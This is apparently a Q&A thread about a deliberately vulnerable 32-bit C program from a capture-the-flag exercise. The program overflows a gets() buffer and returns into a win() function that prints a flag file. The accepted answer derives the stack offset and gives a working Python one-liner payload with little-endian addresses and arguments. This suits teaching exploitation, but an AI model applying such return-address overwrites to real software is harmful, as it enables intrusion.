# Buffer overflow: overrwrite CH

Tags: gcc, assembly, x86, buffer-overflow, exploit

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:

```
xor ch, 0
...
cmp     dword ptr [ebp+10h], 0F00DB4BE
```

Now, if I supply 2 different 4 byte argument, as part of my exploit, i.e. `ABCDEFGH` (assume `ABCD` is the first argument, `EFGH` the second), `CH` becomes `G`. So naturally I thought about crafting the following (assume `ABCD` is right):

`ABCD\x00\x0d\x00\x00`

What happens however, is that nullbutes seem to be ignored! Sending the above results in `CH = 0` and `CL = 0xd`. This happens no matter where I put `\x0d` i.e.:

`ABCD\x0d\x00\x00\x00`
`ABCD\x00\x0d\x00\x00`
`ABCD\x00\x00\x0d\x00`
`ABCD\x00\x00\x00\x0d`

all yield that same behavior.

How can I proceed to only overwrite `CH` while leaving the rest of `ECX` as null?

**EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found [here](https://unix.stackexchange.com/a/174017). Thanks to Michael Petch for pointing it out!**

Source:

```c
#include <stdio.h>
#include <stdlib.h>

void win(long long arg1, int arg2)
{
    if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
    {
        puts("Close, but not quite.");
        exit(1);
    }

    printf("You win!\n");

}

void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}

int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);

    vuln();
    return 0;
}
```

The relevant part of `objdump`'s disassembly of the executable is:

```
080491c2 <win>:
 80491c2:       55                      push   %ebp
 80491c3:       89 e5                   mov    %esp,%ebp
 80491c5:       81 ec 28 01 00 00       sub    $0x128,%esp
 80491cb:       8b 4d 08                mov    0x8(%ebp),%ecx
 80491ce:       89 8d e0 fe ff ff       mov    %ecx,-0x120(%ebp)
 80491d4:       8b 4d 0c                mov    0xc(%ebp),%ecx
 80491d7:       89 8d e4 fe ff ff       mov    %ecx,-0x11c(%ebp)
 80491dd:       8b 8d e0 fe ff ff       mov    -0x120(%ebp),%ecx
 80491e3:       81 f1 55 da b4 14       xor    $0x14b4da55,%ecx
 80491e9:       89 c8                   mov    %ecx,%eax
 80491eb:       8b 8d e4 fe ff ff       mov    -0x11c(%ebp),%ecx
 80491f1:       80 f5 00                xor    $0x0,%ch
 80491f4:       89 ca                   mov    %ecx,%edx
 80491f6:       09 d0                   or     %edx,%eax
 80491f8:       85 c0                   test   %eax,%eax
 80491fa:       75 09                   jne    8049205 <win+0x43>
 80491fc:       81 7d 10 be b4 0d f0    cmpl   $0xf00db4be,0x10(%ebp)
 8049203:       74 1a                   je     804921f <win+0x5d>
 8049205:       83 ec 0c                sub    $0xc,%esp
 8049208:       68 08 a0 04 08          push   $0x804a008
 804920d:       e8 4e fe ff ff          call   8049060 <puts@plt>
 8049212:       83 c4 10                add    $0x10,%esp
 8049215:       83 ec 0c                sub    $0xc,%esp
 8049218:       6a 01                   push   $0x1
 804921a:       e8 51 fe ff ff          call   8049070 <exit@plt>
 804921f:       83 ec 0c                sub    $0xc,%esp
 8049222:       68 1e a0 04 08          push   $0x804a01e
 8049227:       e8 34 fe ff ff          call   8049060 <puts@plt>
 804922c:       83 c4 10                add    $0x10,%esp
 804922f:       83 ec 08                sub    $0x8,%esp
 8049232:       68 27 a0 04 08          push   $0x804a027
 8049237:       68 29 a0 04 08          push   $0x804a029
 804923c:       e8 5f fe ff ff          call   80490a0 <fopen@plt>
 8049241:       83 c4 10                add    $0x10,%esp
 8049244:       89 45 f4                mov    %eax,-0xc(%ebp)
 8049247:       83 7d f4 00             cmpl   $0x0,-0xc(%ebp)
 804924b:       75 12                   jne    804925f <win+0x9d>
 804924d:       83 ec 0c                sub    $0xc,%esp
 8049250:       68 34 a0 04 08          push   $0x804a034
 8049255:       e8 06 fe ff ff          call   8049060 <puts@plt>
 804925a:       83 c4 10                add    $0x10,%esp
 804925d:       eb 31                   jmp    8049290 <win+0xce>
 804925f:       83 ec 04                sub    $0x4,%esp
 8049262:       ff 75 f4                pushl  -0xc(%ebp)
 8049265:       68 00 01 00 00          push   $0x100
 804926a:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049270:       50                      push   %eax
 8049271:       e8 da fd ff ff          call   8049050 <fgets@plt>
 8049276:       83 c4 10                add    $0x10,%esp
 8049279:       83 ec 08                sub    $0x8,%esp
 804927c:       8d 85 f4 fe ff ff       lea    -0x10c(%ebp),%eax
 8049282:       50                      push   %eax
 8049283:       68 86 a0 04 08          push   $0x804a086
 8049288:       e8 a3 fd ff ff          call   8049030 <printf@plt>
 804928d:       83 c4 10                add    $0x10,%esp
 8049290:       90                      nop
 8049291:       c9                      leave
 8049292:       c3                      ret

08049293 <vuln>:
 8049293:       55                      push   %ebp
 8049294:       89 e5                   mov    %esp,%ebp
 8049296:       83 ec 18                sub    $0x18,%esp
 8049299:       83 ec 0c                sub    $0xc,%esp
 804929c:       68 90 a0 04 08          push   $0x804a090
 80492a1:       e8 8a fd ff ff          call   8049030 <printf@plt>
 80492a6:       83 c4 10                add    $0x10,%esp
 80492a9:       83 ec 0c                sub    $0xc,%esp
 80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492af:       50                      push   %eax
 80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt>
 80492b5:       83 c4 10                add    $0x10,%esp
 80492b8:       83 ec 08                sub    $0x8,%esp
 80492bb:       8d 45 e8                lea    -0x18(%ebp),%eax
 80492be:       50                      push   %eax
 80492bf:       68 a0 a0 04 08          push   $0x804a0a0
 80492c4:       e8 67 fd ff ff          call   8049030 <printf@plt>
 80492c9:       83 c4 10                add    $0x10,%esp
 80492cc:       90                      nop
 80492cd:       c9                      leave
 80492ce:       c3                      ret

080492cf <main>:
 80492cf:       8d 4c 24 04             lea    0x4(%esp),%ecx
 80492d3:       83 e4 f0                and    $0xfffffff0,%esp
 80492d6:       ff 71 fc                pushl  -0x4(%ecx)
 80492d9:       55                      push   %ebp
 80492da:       89 e5                   mov    %esp,%ebp
 80492dc:       51                      push   %ecx
 80492dd:       83 ec 04                sub    $0x4,%esp
 80492e0:       a1 34 c0 04 08          mov    0x804c034,%eax
 80492e5:       6a 00                   push   $0x0
 80492e7:       6a 02                   push   $0x2
 80492e9:       6a 00                   push   $0x0
 80492eb:       50                      push   %eax
 80492ec:       e8 9f fd ff ff          call   8049090 <setvbuf@plt>
 80492f1:       83 c4 10                add    $0x10,%esp
 80492f4:       e8 9a ff ff ff          call   8049293 <vuln>
 80492f9:       b8 00 00 00 00          mov    $0x0,%eax
 80492fe:       8b 4d fc                mov    -0x4(%ebp),%ecx
 8049301:       c9                      leave
 8049302:       8d 61 fc                lea    -0x4(%ecx),%esp
 8049305:       c3                      ret
```

Comment: There is not enough context here. We need to see more of the code.

Comment: Surely that's not `xor ch, 0` because that does nothing to `ch`. Yeah, zeroes may be ignored or may terminate input depending on how it's passed to the program and what processing that does.

Comment: Please post ALL of the code. I don't see where or how `vuln` or `win` for that matter get called.

Comment: So I'm gathering what is wanted is a payload (string) you can enter that overflows `buf` so that `vuln` returns to `win` (instead of back to`main`) and has the appearance of being passed the values 0x14B4DA55 and 0xF00DB4BE (as parameter 1 and 2). Thanks for showing all the code. Rather than ask what version of GCC/compiler you are using, can you post the output of `objdump -D progname` where progname is the name of the executable? The reason I ask is that an answer could vary between compilers and options used to build them. Knowing what code you produced can help develop an exploit.

Comment: @MichaelPetch https://pastebin.com/dqNT6eGR

Comment: @MichaelPetch any idea on how to craft an exploit given the code?

Comment: I'm on my mobile and hard to respond properly. I recall from code that the 16 byte buf starts 0x18(24 bytes) beneath EBP. You'd néd to pad the string by 24 bytes + 4 bytes for EBP on the stack and then address of win followed by 4 bytes of padding for a fake return address followed by the 8 bytes of arg1 and then the 4 bytes of arg2 or something like that

Comment: @Jester: apparently it really is `xor ch, 0`!!  So clearly `win` is hand-written, not compiler output.  Other than performance, it's like `test ch,ch` but the code overwrites those FLAGS without  ever reading them, so it's just an expensive NOP.

Comment: @MichaelPetch that was my understanding as well, 8 bytes for arg1 (long long, 8 bytes) and 4 bytes for arg2 (int, 4 bytes) but that circles back to the original question, arg2 would need to be 3 null bytes and 1 0xd byte

Comment: I'm confused about something. I was under the impression that the C code given was what the assembly code was for. But the assembly code doesn't match what objdump is showing. For instance there are calls to fopen and fputs. Are you sure the C code you gave us is correct? Where did it come from?

Comment: The assembly code among other things opens a file called `flags.txt`. It also has a buffer of 256 bytes that the contents of the file are read into and the contents are printed.

Answer (score 2, accepted):

It is unclear why you are hung up on the value in `ECX` or the `xor ch, 0` instruction inside the `win` function. From the *C* code it is clear that the check for a win requires that the 64-bit (`long long`) `arg1` to be 0x14B4DA55 and `arg2` needs to be 0xF00DB4BE. When that condition is met it will print `You win!`

We need some kind of buffer exploit that has the capability to execute the `win` function and make it appear that it is being passed a first argument (64-bit `long long`) and a 32-bit `int` as a second parameter.

The most obvious way to pull this off is overrun `buf` in function `vuln` that strategically overwrites the return address and replaces it with the address of `win`. In the disassembled output `win` is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55  (same as 0x0000000014B4DA55 ) followed by the 32-bit value 0xF00DB4BE.

The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a `call` instruction so we have to make it appear as if one had been done. The goal is to print `You win!` whether the program crashes after that isn't relevant.

The return address (`win`), `arg1`, and `arg2` will have to be stored as bytes in reverse order since the x86 processors are little endian.

The last big question is how many bytes do we have to feed to `gets` to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to `gets`:

> ```
>  80492ac:       8d 45 e8                lea    -0x18(%ebp),%eax
>  80492af:       50                      push   %eax
>  80492b0:       e8 8b fd ff ff          call   8049040 <gets@plt
> ```

`LEA` is being used to compute the address (Effective Address) of `buf` on the stack and passing that as the first argument to `gets`. 0x18 is 24 bytes (decimal). Although `buf` was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed `EBP` on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.

Using PYTHON to generate the input sequence is common in many tutorials. Embedding NUL(`\0`) characters in a shell string directly may cause a shell program to prematurely terminate a string at the NUL byte (an [issue that people have when using BASH](https://unix.stackexchange.com/a/174017)). We can pipe the byte sequence to our program using something like:

```
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
    +"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
```

Where `progname` is the name of your executable. When run it should appear similar to:

> ```
> Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
> You win!
> Segmentation fault
> ```

**Note:** the 4 characters making up the return address between the `A`'s and `B`'s are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.

Comment: Yes!! I don't know why I didn't manage it before, this worked perfectly. I still don't understand how it can be that only ```ch``` is xored and then ```ecx``` is xored with ```eax``` but it yields 0

Answer (score 0):

As a limited answer to my own question, specifically regarding why null bytes are ignored:

**It seems to be an issue with bash seemingly ignoring nullbytes**

Many other of my peers faced the same problem when writing the exploit. It would work on the server but not locally when using `gdb` for example. Bash would simply disregard the nullbytes and thus `\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0` would be read in as `\x55\xda\xb4\x14\xbe\xb4\x0d\xf0`. The exact reason why it behaves that way still eludes me but it's a good thing to keep in mind!

Comment: One of the reasons why I showed how to pipe data using python was to avoid the issue of embedding a NUL character in a shell string (especially when using bash). You may wish to read this answer: https://unix.stackexchange.com/a/174017

Comment: This is great, basically explains it!

Comment: That's the same reason you need to avoid `0` bytes in most exploit payloads: the vulnerability is usually `strcpy` or equivalent that works with 0-terminated C strings.  Buffer overflows with explicit-length stuff is much rarer.